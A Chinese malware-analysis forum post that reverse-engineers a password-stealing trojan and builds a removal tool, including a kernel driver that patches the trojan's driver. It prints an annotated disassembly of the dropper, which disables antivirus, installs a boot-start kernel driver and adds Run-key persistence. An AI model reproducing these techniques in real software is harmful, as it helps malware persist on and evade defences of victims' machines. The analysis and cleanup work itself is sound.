
[原创]第三轮

2008-10-29 11:37
3247
一楼贴分析

外面的exe
1. 把资源100这个驱动放到system32\drivers\HBKernel32.sys 并起来
2. 驱动0x22E007
3. 把资源102这个dll放到system32\HBQQXX.dll
4. 驱动0x22E00F 4 0
5. 创建一个临时批处理,把system32\HBQQXX.dll改成system32\X.tmp
6. 驱动0x22E00F 4 1
7. 向HBInject32窗口发送 WM_COPYDATA: HBQQXX.dll 让这个dll启动
8. 打开HBInjectMutex mutex, 不在的话,则把101放到system32\system.exe, 并起来
9. 注册设置自启动system.exe
10. 批处理自删除
 
; Dropper main routine at 00401200 (analyst-annotated OllyDbg listing). Order of work:
; kill a rival process, tamper with 360, install HBKernel32.sys as a boot-start kernel
; service, drop HBQQXX.dll (with a replace-in-use path), drop and start System.exe when
; the HBInjectMutex is absent, add a Run-key entry, exit. Constant meanings in the
; comments below are the documented Win32 values for the API named in the thunk comment
; on that call; module-internal calls carry the original analyst notes (translated).
00401200     55                 push ebp
00401201     8BEC               mov ebp,esp
00401203     81C4 5CFDFFFF      add esp,-2A4
00401209     6A 00              push 0
0040120B     E8 30090000        call a.00401B40                   ; jmp to kernel32.GetModuleHandleA
00401210     8985 90FDFFFF      mov dword ptr ss:[ebp-270],eax    ; own hModule, used for the resource drops below
00401216     68 A0000000        push 0A0
0040121B     68 00304000        push a.00403000                   ; ASCII "my.exe"
00401220     68 00304000        push a.00403000                   ; ASCII "my.exe"
00401225     E8 6F080000        call a.00401A99                   ; decode the process-name table (same buffer as source and destination, length 0A0)
0040122A     C745 FC FFFFFFFF   mov dword ptr ss:[ebp-4],-1       ; [ebp-4] = driver handle, INVALID_HANDLE_VALUE until opened
00401231     E8 0E050000        call a.00401744                   ; if my.exe is running, kill the process
00401236     6A 00              push 0
00401238     68 E1204000        push a.004020E1                   ; ASCII "AskTao"
0040123D     E8 7E080000        call a.00401AC0                   ; sends messages 0x01-0x10000 to the AskTao window
00401242     E8 8A030000        call a.004015D1                   ; registry tampering; disables 360 (AV)
00401247     6A 00              push 0
00401249     6A 00              push 0
0040124B     6A 03              push 3                            ; OPEN_EXISTING
0040124D     6A 00              push 0
0040124F     6A 00              push 0
00401251     68 000000C0        push C0000000                     ; GENERIC_READ|GENERIC_WRITE
00401256     68 E8204000        push a.004020E8                   ; ASCII "\\.\slHBKernel32"
0040125B     E8 AA080000        call a.00401B0A                   ; jmp to kernel32.CreateFileA
00401260     83F8 FF            cmp eax,-1
00401263     0F85 EF000000      jnz a.00401358                    ; device already exists -> driver is resident, skip the install below
00401269     68 04010000        push 104
0040126E     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
00401274     50                 push eax
00401275     E8 D8080000        call a.00401B52                   ; jmp to kernel32.GetSystemDirectoryA
0040127A     68 F9204000        push a.004020F9                   ; ASCII "\drivers\HBKernel32.sys"
0040127F     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
00401285     50                 push eax
00401286     E8 27090000        call a.00401BB2                   ; jmp to kernel32.lstrcatA
0040128B     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
00401291     50                 push eax
00401292     6A 64              push 64                           ; resource id 100
00401294     6A 0A              push 0A                           ; resource type 10 (RT_RCDATA)
00401296     FFB5 90FDFFFF      push dword ptr ss:[ebp-270]       ; a.00400000
0040129C     E8 AF050000        call a.00401850                   ; drop resource 100 (the driver) to system32\drivers\HBKernel32.sys
004012A1     0BC0               or eax,eax
004012A3     0F84 B2000000      je a.0040135B                     ; drop failed -> skip service registration
004012A9     68 3F000F00        push 0F003F                       ; SC_MANAGER_ALL_ACCESS
004012AE     6A 00              push 0
004012B0     6A 00              push 0
004012B2     E8 37090000        call a.00401BEE                   ; jmp to advapi32.OpenSCManagerA
004012B7     0BC0               or eax,eax
004012B9     0F84 97000000      je a.00401356
004012BF     8985 F0FDFFFF      mov dword ptr ss:[ebp-210],eax    ; hSCManager
004012C5     6A 10              push 10                           ; SERVICE_START
004012C7     68 11214000        push a.00402111                   ; ASCII "HBKernel32"
004012CC     FFB5 F0FDFFFF      push dword ptr ss:[ebp-210]
004012D2     E8 1D090000        call a.00401BF4                   ; jmp to advapi32.OpenServiceA
004012D7     0BC0               or eax,eax
004012D9     75 31              jnz short a.0040130C              ; service already registered -> go straight to StartServiceA
; CreateServiceA arguments (pushed right to left). Persistence detail for defenders: a
; kernel driver registered with start type 0 in the "Boot Bus Extender" load-order group is
; loaded among the very first boot drivers, before most other drivers on the system.
004012DB     6A 00              push 0                            ; lpPassword
004012DD     6A 00              push 0                            ; lpServiceStartName
004012DF     6A 00              push 0                            ; lpDependencies
004012E1     6A 00              push 0                            ; lpdwTagId
004012E3     68 2E214000        push a.0040212E                   ; ASCII "Boot Bus Extender"  (lpLoadOrderGroup)
004012E8     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
004012EE     50                 push eax                          ; lpBinaryPathName = system32\drivers\HBKernel32.sys
004012EF     6A 00              push 0                            ; dwErrorControl = SERVICE_ERROR_IGNORE
004012F1     6A 00              push 0                            ; dwStartType = SERVICE_BOOT_START
004012F3     6A 01              push 1                            ; dwServiceType = SERVICE_KERNEL_DRIVER
004012F5     6A 10              push 10                           ; dwDesiredAccess = SERVICE_START
004012F7     68 1C214000        push a.0040211C                   ; ASCII "HBKernel32 Driver"  (lpDisplayName)
004012FC     68 11214000        push a.00402111                   ; ASCII "HBKernel32"  (lpServiceName)
00401301     FFB5 F0FDFFFF      push dword ptr ss:[ebp-210]
00401307     E8 DC080000        call a.00401BE8                   ; jmp to advapi32.CreateServiceA
0040130C     0BC0               or eax,eax
0040130E     74 3B              je short a.0040134B
00401310     8985 ECFDFFFF      mov dword ptr ss:[ebp-214],eax    ; hService
00401316     6A 00              push 0
00401318     6A 00              push 0
0040131A     50                 push eax
0040131B     E8 EC080000        call a.00401C0C                   ; jmp to advapi32.StartServiceA
00401320     0BC0               or eax,eax
00401322     74 1C              je short a.00401340
00401324     6A 00              push 0
00401326     6A 00              push 0
00401328     6A 03              push 3                            ; OPEN_EXISTING
0040132A     6A 00              push 0
0040132C     6A 00              push 0
0040132E     68 000000C0        push C0000000                     ; GENERIC_READ|GENERIC_WRITE
00401333     68 E8204000        push a.004020E8                   ; ASCII "\\.\slHBKernel32"
00401338     E8 CD070000        call a.00401B0A                   ; jmp to kernel32.CreateFileA
0040133D     8945 FC            mov dword ptr ss:[ebp-4],eax      ; keep the freshly started driver's device handle
00401340     FFB5 ECFDFFFF      push dword ptr ss:[ebp-214]
00401346     E8 97080000        call a.00401BE2                   ; jmp to advapi32.CloseServiceHandle
0040134B     FFB5 F0FDFFFF      push dword ptr ss:[ebp-210]
00401351     E8 8C080000        call a.00401BE2                   ; jmp to advapi32.CloseServiceHandle
00401356     EB 03              jmp short a.0040135B
00401358     8945 FC            mov dword ptr ss:[ebp-4],eax      ; driver was already running: keep that handle
0040135B     837D FC FF         cmp dword ptr ss:[ebp-4],-1
0040135F     74 1E              je short a.0040137F               ; no device handle -> skip the IOCTL
00401361     6A 00              push 0
00401363     8D85 E8FDFFFF      lea eax,dword ptr ss:[ebp-218]
00401369     50                 push eax                          ; lpBytesReturned
0040136A     6A 00              push 0
0040136C     6A 00              push 0
0040136E     6A 00              push 0
00401370     6A 00              push 0
00401372     68 07E02200        push 22E007                       ; IOCTL 22E007 (summary step 2; no in/out buffers; semantics not established in the analysis)
00401377     FF75 FC            push dword ptr ss:[ebp-4]
0040137A     E8 A3070000        call a.00401B22                   ; jmp to kernel32.DeviceIoControl
0040137F     68 04010000        push 104
00401384     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
0040138A     50                 push eax
0040138B     E8 C2070000        call a.00401B52                   ; jmp to kernel32.GetSystemDirectoryA
00401390     68 40214000        push a.00402140
00401395     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
0040139B     50                 push eax
0040139C     E8 11080000        call a.00401BB2                   ; jmp to kernel32.lstrcatA
004013A1     68 AE314000        push a.004031AE                   ; ASCII "HBQQXX.dll"
004013A6     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
004013AC     50                 push eax
004013AD     E8 00080000        call a.00401BB2                   ; jmp to kernel32.lstrcatA
004013B2     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
004013B8     50                 push eax
004013B9     6A 66              push 66                           ; resource id 102
004013BB     6A 0A              push 0A                           ; resource type 10 (RT_RCDATA)
004013BD     FFB5 90FDFFFF      push dword ptr ss:[ebp-270]       ; a.00400000
004013C3     E8 88040000        call a.00401850                   ; drop resource 102 (the DLL) to system32\HBQQXX.dll
004013C8     0BC0               or eax,eax
004013CA     0F85 DB000000      jnz a.004014AB                    ; drop succeeded -> skip the replace-in-use path
; Drop failed (presumably because the existing HBQQXX.dll is in use): move the old copy
; aside under a temp name, re-drop, then tell the resident System.exe to reload it.
004013D0     68 04010000        push 104
004013D5     8D85 F4FDFFFF      lea eax,dword ptr ss:[ebp-20C]
004013DB     50                 push eax
004013DC     E8 71070000        call a.00401B52                   ; jmp to kernel32.GetSystemDirectoryA
004013E1     8D85 F4FDFFFF      lea eax,dword ptr ss:[ebp-20C]
004013E7     50                 push eax
004013E8     6A 00              push 0
004013EA     6A 00              push 0
004013EC     8D85 F4FDFFFF      lea eax,dword ptr ss:[ebp-20C]
004013F2     50                 push eax
004013F3     E8 60070000        call a.00401B58                   ; jmp to kernel32.GetTempFileNameA  (uUnique = 0: creates the file in system32)
004013F8     8D85 F4FDFFFF      lea eax,dword ptr ss:[ebp-20C]
004013FE     50                 push eax
004013FF     E8 18070000        call a.00401B1C                   ; jmp to kernel32.DeleteFileA  (only the unique name is kept)
00401404     8D85 F4FDFFFF      lea eax,dword ptr ss:[ebp-20C]
0040140A     50                 push eax
0040140B     6A 20              push 20
0040140D     8D85 5CFDFFFF      lea eax,dword ptr ss:[ebp-2A4]
00401413     50                 push eax
00401414     E8 2B060000        call a.00401A44                   ; helper on the temp name (not analysed in the post)
00401419     8D85 5CFDFFFF      lea eax,dword ptr ss:[ebp-2A4]
0040141F     50                 push eax
00401420     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
00401426     50                 push eax
00401427     FF75 FC            push dword ptr ss:[ebp-4]
0040142A     E8 79040000        call a.004018A8                   ; summary steps 4-6: IOCTL 22E00F 4 0, rename HBQQXX.dll to X.tmp, IOCTL 22E00F 4 1
0040142F     6A 04              push 4                            ; MOVEFILE_DELAY_UNTIL_REBOOT
00401431     6A 00              push 0                            ; lpNewFileName = NULL -> delete
00401433     8D85 F4FDFFFF      lea eax,dword ptr ss:[ebp-20C]
00401439     50                 push eax
0040143A     E8 3D070000        call a.00401B7C                   ; jmp to kernel32.MoveFileExA  (queues the temp name for deletion at next boot via PendingFileRenameOperations - a durable artifact)
0040143F     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
00401445     50                 push eax
00401446     6A 66              push 66                           ; resource id 102
00401448     6A 0A              push 0A                           ; resource type 10 (RT_RCDATA)
0040144A     FFB5 90FDFFFF      push dword ptr ss:[ebp-270]       ; a.00400000
00401450     E8 FB030000        call a.00401850                   ; re-drop resource 102 now that the old DLL has been moved aside
00401455     0BC0               or eax,eax
00401457     74 52              je short a.004014AB
00401459     68 42214000        push a.00402142                   ; ASCII "HBInject32"
0040145E     6A 00              push 0
00401460     E8 6B070000        call a.00401BD0                   ; jmp to user32.FindWindowA  (hidden window owned by System.exe)
00401465     0BC0               or eax,eax
00401467     74 42              je short a.004014AB
00401469     8985 8CFDFFFF      mov dword ptr ss:[ebp-274],eax    ; hwnd
0040146F     C785 80FDFFFF 0000>mov dword ptr ss:[ebp-280],0      ; COPYDATASTRUCT.dwData = 0
00401479     68 AE314000        push a.004031AE                   ; ASCII "HBQQXX.dll"
0040147E     E8 41070000        call a.00401BC4                   ; jmp to kernel32.lstrlenA
00401483     8985 84FDFFFF      mov dword ptr ss:[ebp-27C],eax    ; COPYDATASTRUCT.cbData = 10 (no terminator included)
00401489     8D05 AE314000      lea eax,dword ptr ds:[4031AE]
0040148F     8985 88FDFFFF      mov dword ptr ss:[ebp-278],eax    ; COPYDATASTRUCT.lpData = "HBQQXX.dll"
00401495     8D85 80FDFFFF      lea eax,dword ptr ss:[ebp-280]
0040149B     50                 push eax                          ; lParam = &COPYDATASTRUCT
0040149C     6A 00              push 0
0040149E     6A 4A              push 4A                           ; WM_COPYDATA
004014A0     FFB5 8CFDFFFF      push dword ptr ss:[ebp-274]
004014A6     E8 31070000        call a.00401BDC                   ; jmp to user32.SendMessageA  (System.exe's WM_COPYDATA handler stops the old DLL and loads the named one)
004014AB     68 4D214000        push a.0040214D                   ; ASCII "HBInjectMutex"
004014B0     6A 00              push 0
004014B2     68 03001F00        push 1F0003                       ; MUTEX_ALL_ACCESS
004014B7     E8 C6060000        call a.00401B82                   ; jmp to kernel32.OpenMutexA
004014BC     0BC0               or eax,eax
004014BE     0F85 A4000000      jnz a.00401568                    ; mutex exists -> System.exe already running, just close the handle
004014C4     E8 6B060000        call a.00401B34                   ; jmp to ntdll.RtlGetLastWin32Error  (== GetLastError)
004014C9     83F8 02            cmp eax,2                         ; ERROR_FILE_NOT_FOUND: mutex absent -> drop and start System.exe
004014CC     0F85 9C000000      jnz a.0040156E
004014D2     68 04010000        push 104
004014D7     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
004014DD     50                 push eax
004014DE     E8 6F060000        call a.00401B52                   ; jmp to kernel32.GetSystemDirectoryA
004014E3     68 5B214000        push a.0040215B                   ; ASCII "\System.exe"
004014E8     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
004014EE     50                 push eax
004014EF     E8 BE060000        call a.00401BB2                   ; jmp to kernel32.lstrcatA
004014F4     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
004014FA     50                 push eax
004014FB     6A 65              push 65                           ; resource id 101
004014FD     6A 0A              push 0A                           ; resource type 10 (RT_RCDATA)
004014FF     FFB5 90FDFFFF      push dword ptr ss:[ebp-270]       ; a.00400000
00401505     E8 46030000        call a.00401850                   ; drop resource 101 to system32\System.exe
0040150A     0BC0               or eax,eax
0040150C     74 58              je short a.00401566
0040150E     C785 A4FDFFFF 4400>mov dword ptr ss:[ebp-25C],44     ; STARTUPINFOA.cb = sizeof(STARTUPINFOA)
00401518     8D85 A4FDFFFF      lea eax,dword ptr ss:[ebp-25C]
0040151E     50                 push eax
0040151F     E8 28060000        call a.00401B4C                   ; jmp to kernel32.GetStartupInfoA
00401524     8D85 94FDFFFF      lea eax,dword ptr ss:[ebp-26C]
0040152A     50                 push eax                          ; lpProcessInformation
0040152B     8D85 A4FDFFFF      lea eax,dword ptr ss:[ebp-25C]
00401531     50                 push eax                          ; lpStartupInfo
00401532     6A 00              push 0
00401534     6A 00              push 0
00401536     6A 00              push 0
00401538     6A 00              push 0
0040153A     6A 00              push 0
0040153C     6A 00              push 0
0040153E     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
00401544     50                 push eax                          ; lpCommandLine = system32\System.exe
00401545     6A 00              push 0                            ; lpApplicationName = NULL
00401547     E8 C4050000        call a.00401B10                   ; jmp to kernel32.CreateProcessA
0040154C     0BC0               or eax,eax
0040154E     74 16              je short a.00401566
00401550     FFB5 94FDFFFF      push dword ptr ss:[ebp-26C]       ; PROCESS_INFORMATION.hProcess
00401556     E8 A9050000        call a.00401B04                   ; jmp to kernel32.CloseHandle
0040155B     FFB5 98FDFFFF      push dword ptr ss:[ebp-268]       ; PROCESS_INFORMATION.hThread
00401561     E8 9E050000        call a.00401B04                   ; jmp to kernel32.CloseHandle
00401566     EB 06              jmp short a.0040156E
00401568     50                 push eax
00401569     E8 96050000        call a.00401B04                   ; jmp to kernel32.CloseHandle
0040156E     837D FC FF         cmp dword ptr ss:[ebp-4],-1
00401572     74 08              je short a.0040157C
00401574     FF75 FC            push dword ptr ss:[ebp-4]
00401577     E8 88050000        call a.00401B04                   ; jmp to kernel32.CloseHandle  (driver device handle)
; Persistence IoC: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HBService32 = "System.exe"
; (REG_SZ, no path - presumably resolved through the search path at logon).
0040157C     8D85 7CFDFFFF      lea eax,dword ptr ss:[ebp-284]
00401582     50                 push eax                          ; phkResult
00401583     68 3F000F00        push 0F003F                       ; KEY_ALL_ACCESS
00401588     6A 00              push 0
0040158A     68 67214000        push a.00402167                   ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040158F     68 02000080        push 80000002                     ; HKEY_LOCAL_MACHINE
00401594     E8 67060000        call a.00401C00                   ; jmp to advapi32.RegOpenKeyExA
00401599     0BC0               or eax,eax
0040159B     75 26              jnz short a.004015C3
0040159D     6A 0B              push 0B                           ; cbData = 11 ("System.exe" + NUL)
0040159F     68 A1214000        push a.004021A1                   ; ASCII "System.exe"
004015A4     6A 01              push 1                            ; dwType = REG_SZ
004015A6     6A 00              push 0                            ; Reserved
004015A8     68 95214000        push a.00402195                   ; ASCII "HBService32"  (value name)
004015AD     FFB5 7CFDFFFF      push dword ptr ss:[ebp-284]
004015B3     E8 4E060000        call a.00401C06                   ; jmp to advapi32.RegSetValueExA
004015B8     FFB5 7CFDFFFF      push dword ptr ss:[ebp-284]
004015BE     E8 37060000        call a.00401BFA                   ; jmp to advapi32.RegCloseKey
004015C3     E8 38FAFFFF        call a.00401000                   ; not analysed in the post (summary step 10 is the batch self-delete)
004015C8     6A 00              push 0
004015CA     E8 59050000        call a.00401B28                   ; jmp to kernel32.ExitProcess
004015CF     C9                 leave
004015D0     C3                 retn
 
------------------------------------------------------------------------
system.exe
1. 创建 HBInjectMutex mutex
2. 打开驱动\\.\slHBKernel32, 没有就先起驱动
3. 驱动0x22E007
4. 驱动0x22E00B 4 PID  ?
5. 创建隐藏窗口HBInject32
   WM_CREATE: 解码dll表, 建定时器
   WM_CLOSE: 把当前的dll给StopServiceEx
   WM_QUERYENDSESSION: 把当前的dll给StopServiceEx
   WM_COPYDATA: 收到dll名字后(这个版本是HBQQXX.dll), 先把当前的这个dll给StopServiceEx, 再加载新的,StartServiceEx
   WM_TIMER: 1. "Software\Microsoft\Windows NT\CurrentVersion\Windows" AppInit_Dlls
                "Software\Microsoft\Windows\CurrentVersion\Run" system.exe
             2. 一个一个加载上面那些dll(其实是N个版本), 调用他们的StartServiceEx
             3. 杀360
 
    
 
------------------------------------------------------------------------
HBQQXX.dll
StartServiceEx: setwindowshook
StopServiceEx: stophook
dllmain: 只搞tty3d.exe和qqlogin.exe 怎么盗的没兴趣
 
------------------------------------------------------------------------
HBKernel32.sys
idb

2
因为不清楚写物理内存和ZwSystemDebugControl 算0环方法还是3环方法
所以我很老实的写了个驱动方法

//killhb.sys
#include "ntddk.h"
 
/*
 * Undocumented ntoskrnl export, imported directly. Used below with information
 * class 0x0B (SystemModuleInformation) to enumerate loaded kernel modules.
 * A buffer that is too small yields STATUS_INFO_LENGTH_MISMATCH.
 * (Parameter spelling "SysInformatoinClass" kept as in the original.)
 */
__declspec(dllimport) NTSTATUS __stdcall
ZwQuerySystemInformation(
    ULONG   SysInformatoinClass,
    PVOID   SystemInformation,
    ULONG   SystemInformationLength,
    PULONG  ReturnLength OPTIONAL
    );
 
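/*
 * Locate the loaded HBKernel32.sys image via SystemModuleInformation (class 0x0B).
 *
 * KrnlBase / KrnlSize receive the module's ImageBase and ImageSize when it is found;
 * they are left untouched otherwise. Each module entry is 0x11C bytes and follows a
 * 4-byte module count: ImageBase at +0x08, ImageSize at +0x0C, FullPathName (256 bytes)
 * at +0x1C. The comparison is on the file-name component only, case-insensitively.
 *
 * Returns TRUE when HBKernel32.sys is loaded, FALSE on allocation failure, query
 * failure, or when no loaded module has that name. The pool buffer is always freed.
 *
 * Fix over the original: when the grow-and-retry re-allocation failed, the old loop
 * kept calling ZwQuerySystemInformation with a NULL buffer forever; it now returns
 * FALSE. The always-true "Name != NULL" test after the fallback was also removed.
 */
BOOLEAN __stdcall GetHBBaseAndSize(PULONG KrnlBase, PULONG KrnlSize)
{
    ULONG       PoolSize = 0x1000;
    PVOID       Pool;
    NTSTATUS    status;
    PUCHAR      Entry;
    ULONG       Count;
    ULONG       i;

    Pool = ExAllocatePoolWithTag(NonPagedPool, PoolSize, ' kdD');
    if (Pool == NULL)
        return FALSE;

    /* Grow the buffer until the whole module list fits. */
    for (;;)
    {
        status = ZwQuerySystemInformation(0x0B, Pool, PoolSize, NULL);
        if (status != STATUS_INFO_LENGTH_MISMATCH)
            break;
        ExFreePool(Pool);
        PoolSize = PoolSize * 2;
        Pool = ExAllocatePoolWithTag(NonPagedPool, PoolSize, ' kdD');
        if (Pool == NULL)
            return FALSE;
    }
    if (!NT_SUCCESS(status))
    {
        ExFreePool(Pool);
        return FALSE;
    }

    Count = *(PULONG)Pool;
    Entry = (PUCHAR)Pool + 4;
    for (i = 0; i < Count; i++, Entry += 0x11C)
    {
        PUCHAR FullPath = Entry + 0x1C;
        PUCHAR Name = strrchr(FullPath, '\\');

        /* Use the component after the last backslash, or the whole string if none. */
        Name = (Name != NULL) ? Name + 1 : FullPath;
        /* NOTE(review): assumes FullPathName is NUL-terminated within its 256 bytes - confirm. */
        if (_stricmp(Name, "HBKernel32.sys") == 0)
        {
            *KrnlBase = *(PULONG)(Entry + 0x08);
            *KrnlSize = *(PULONG)(Entry + 0x0C);
            ExFreePool(Pool);
            return TRUE;
        }
    }

    ExFreePool(Pool);
    return FALSE;
}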
 
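/*
 * Driver entry: neutralise the resident HBKernel32.sys by writing a flag inside its
 * image, then fail on purpose so this helper driver is unloaded immediately.
 *
 * pDriverObject / pRegPath are unused. The two offsets are specific to the analysed
 * sample build: 0x2D6D must hold the little-endian word 0x3D83 (bytes 83 3D) as a
 * signature check, and the dword at 0x3F20 is set to 1 - presumably a stop flag the
 * driver's worker thread polls (the author reports the driver thread stops) - confirm.
 * A different build fails the signature check and nothing is written.
 *
 * Always returns STATUS_UNSUCCESSFUL; callers that start this driver via the SCM will
 * therefore see StartService fail even when the patch was applied.
 *
 * Fix over the original: both accesses are now checked against the reported image
 * size, so a smaller build cannot be read or written past its end.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegPath)
{
    BOOLEAN rt;
    ULONG   base = 0;
    ULONG   size = 0;

    (void)pDriverObject;
    (void)pRegPath;

    rt = GetHBBaseAndSize(&base, &size);
    DbgPrint("%08X, %08X, %08X", rt, base, size);
    /* 0x3F20 is the higher of the two offsets; require the whole dword to fit. */
    if (rt && size >= 0x3F20 + sizeof(ULONG))
    {
        if (*(PUSHORT)(base+0x2D6D) == 0x3D83)
        {
            *(PULONG)(base+0x3F20) = 1;
            DbgPrint("fuck");
        }
    }

    return STATUS_UNSUCCESSFUL;
}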


专杀程序
//3.cpp
#include <windows.h>
#include <shlwapi.h>
#pragma comment (lib, "shlwapi.lib")
#pragma comment (linker, "/subsystem:windows")
#pragma comment (linker, "/entry:start")
#pragma comment (linker, "/filealign:0x200")
 
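/*
 * Step 0: take the HBInjectMutex ourselves so the dropper will not relaunch System.exe
 * (it only drops and starts System.exe when that mutex is absent), then unhook
 * HBQQXX.dll from this process if it was injected into us. The mutex handle is
 * deliberately left open for the lifetime of the process.
 *
 * Fix over the original: the export was invoked through `__asm call eax` without
 * checking that GetProcAddress succeeded, so a missing StopServiceEx export jumped to
 * address 0. StopServiceEx takes no arguments (the original used a bare call with no
 * stack cleanup), so a void(*)(void) pointer performs the same call without asm.
 */
void s0()
{
    typedef void (*stop_fn)(void);
    HMODULE mod;
    stop_fn stop;

    CreateMutex(NULL, FALSE, "HBInjectMutex");
    mod = GetModuleHandle("HBQQXX.dll");
    if (mod == NULL)
    {
        return;
    }
    stop = (stop_fn)GetProcAddress(mod, "StopServiceEx");
    if (stop != NULL)
    {
        stop();
    }
    FreeLibrary(mod);
}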
 
/*
 * Step 1: talk to the resident HBKernel32 driver through its own device.
 *
 * Opens \\.\slHBkernel32 and issues the two control codes the malware's own components
 * use: 0x22E00F with a 4-byte input of 0 (dropper summary step 4) and 0x22E00B with a
 * 4-byte input of 0 and a 4-byte output (System.exe summary step 4). What the driver
 * does with them is not established in the analysis; the DeviceIoControl results are
 * not checked.
 *
 * Returns 0 when the device cannot be opened (driver not loaded), 1 otherwise.
 */
int s1()
{
    DWORD   zero = 0;
    DWORD   reply = 0;
    DWORD   returned;
    HANDLE  dev;

    dev = CreateFile("\\\\.\\slHBkernel32", GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (dev == INVALID_HANDLE_VALUE)
        return 0;

    DeviceIoControl(dev, 0x22E00F, &zero, sizeof(zero), NULL, 0, &returned, NULL);
    DeviceIoControl(dev, 0x22E00B, &zero, sizeof(zero), &reply, sizeof(reply), &returned, NULL);
    CloseHandle(dev);
    return 1;
}
 
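/*
 * Step 2: load killhb.sys once as a temporary kernel service.
 *
 * Copies killhb.sys from the current directory to <system32>\drivers, registers it as
 * a demand-start kernel driver named "killhb" (or reuses an existing registration),
 * starts it, then deletes the service and the file again.
 *
 * Returns 1 when the service could be created/opened and a start was attempted, 0 on
 * path-too-long, copy or SCM failure (the copied file is removed on those paths).
 *
 * StartService's result is intentionally not used: killhb's DriverEntry returns
 * STATUS_UNSUCCESSFUL on purpose so the driver unloads right away, which makes
 * StartService report failure even when the patch was applied.
 *
 * Fixes over the original: a failed CopyFile is no longer ignored (CreateService would
 * otherwise point at a missing file and the start failure would go unnoticed); the
 * system-directory length is checked before appending; OpenService asks for
 * SERVICE_ALL_ACCESS (a service-object mask) instead of SC_MANAGER_ALL_ACCESS, matching
 * the CreateService call.
 */
int s2()
{
    SC_HANDLE   schService;
    SC_HANDLE   schSCManager;
    char        szFileName[MAX_PATH];
    DWORD       len;

    len = GetSystemDirectory(szFileName, MAX_PATH);
    if (len == 0 || len + sizeof("\\drivers\\killhb.sys") > MAX_PATH)
    {
        return 0;
    }
    lstrcat(szFileName, "\\drivers\\killhb.sys");
    if (!CopyFile("killhb.sys", szFileName, FALSE))
    {
        return 0;
    }
    schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (NULL == schSCManager)
    {
        DeleteFile(szFileName);
        return 0;
    }
    schService = OpenService(schSCManager, "killhb", SERVICE_ALL_ACCESS);
    if (NULL == schService)
    {
        schService = CreateService(schSCManager,
                                "killhb",
                                "killhb",
                                SERVICE_ALL_ACCESS,
                                SERVICE_KERNEL_DRIVER,
                                SERVICE_DEMAND_START,
                                SERVICE_ERROR_NORMAL,
                                szFileName,
                                NULL,
                                NULL,
                                NULL,
                                NULL,
                                NULL
                                );
        Sleep(200);
    }
    if (NULL == schService)
    {
        CloseServiceHandle(schSCManager);
        DeleteFile(szFileName);
        return 0;
    }
    StartService(schService, 0, NULL);
    Sleep(200);             /* give DriverEntry time to run before the service is removed */
    DeleteService(schService);
    CloseServiceHandle(schService);
    CloseServiceHandle(schSCManager);
    DeleteFile(szFileName);

    return 1;
}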
 
/*
 * Step 3: ask System.exe's hidden "HBInject32" window to shut its hook down. Per the
 * analysis, both WM_CLOSE and WM_QUERYENDSESSION make that window call the current
 * DLL's StopServiceEx. Returns 0 if the window is not present, 1 after both messages
 * were sent (SendMessage results are not checked).
 */
int s3()
{
    HWND target = FindWindow(NULL, "HBInject32");

    if (target != NULL)
    {
        SendMessage(target, WM_CLOSE, 0, 0);
        SendMessage(target, WM_QUERYENDSESSION, 0, 0);
        return 1;
    }
    return 0;
}
 
/*
 * Step 4: remove the persistence entries under HKLM.
 *
 * Deletes the AppInit_Dlls value (the whole value, not just the malware's entry, so
 * any legitimate AppInit DLLs are removed as well), the HBService32 Run entry, and the
 * HBKernel32 service key from each control set the original enumerated.
 *
 * Always returns 1; the SHDeleteValue/SHDeleteKey results are not checked.
 */
int s4()
{
    static const char *const service_keys[] = {
        "SYSTEM\\ControlSet\\Services\\HBKernel32",
        "SYSTEM\\ControlSet001\\Services\\HBKernel32",
        "SYSTEM\\ControlSet002\\Services\\HBKernel32",
        "SYSTEM\\ControlSet003\\Services\\HBKernel32",
        "SYSTEM\\CurrentControlSet\\Services\\HBKernel32",
    };
    size_t k;

    SHDeleteValue(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", "AppInit_Dlls");
    SHDeleteValue(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "HBService32");
    for (k = 0; k < sizeof(service_keys) / sizeof(service_keys[0]); k++)
    {
        SHDeleteKey(HKEY_LOCAL_MACHINE, service_keys[k]);
    }
    return 1;
}
 
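/*
 * Move one dropped file out of the system directory into %TEMP% under a throw-away
 * name and delete it there. Whatever cannot be deleted is left in %TEMP% (the author
 * notes the remains end up in the temp directory).
 *
 * sysrel:  path relative to the system directory, leading backslash included.
 * tmpname: file name to use under the temp directory, leading backslash included.
 *
 * Fix over the original: both paths are length-checked before appending; the
 * original appended to MAX_PATH buffers unconditionally.
 */
static void s5_move_out(const char *sysrel, const char *tmpname)
{
    char  src[MAX_PATH];
    char  dst[MAX_PATH];
    DWORD n;

    n = GetTempPath(MAX_PATH, dst);
    if (n == 0 || n + (DWORD)lstrlen(tmpname) >= MAX_PATH)
    {
        return;
    }
    lstrcat(dst, tmpname);
    DeleteFile(dst);

    n = GetSystemDirectory(src, MAX_PATH);
    if (n == 0 || n + (DWORD)lstrlen(sysrel) >= MAX_PATH)
    {
        return;
    }
    lstrcat(src, sysrel);
    MoveFile(src, dst);
    DeleteFile(dst);
}

/*
 * Step 5: dispose of the dropped binaries - System.exe, HBQQXX.dll and
 * drivers\HBKernel32.sys - one by one via s5_move_out.
 *
 * Always returns 1; individual move/delete results are not checked.
 */
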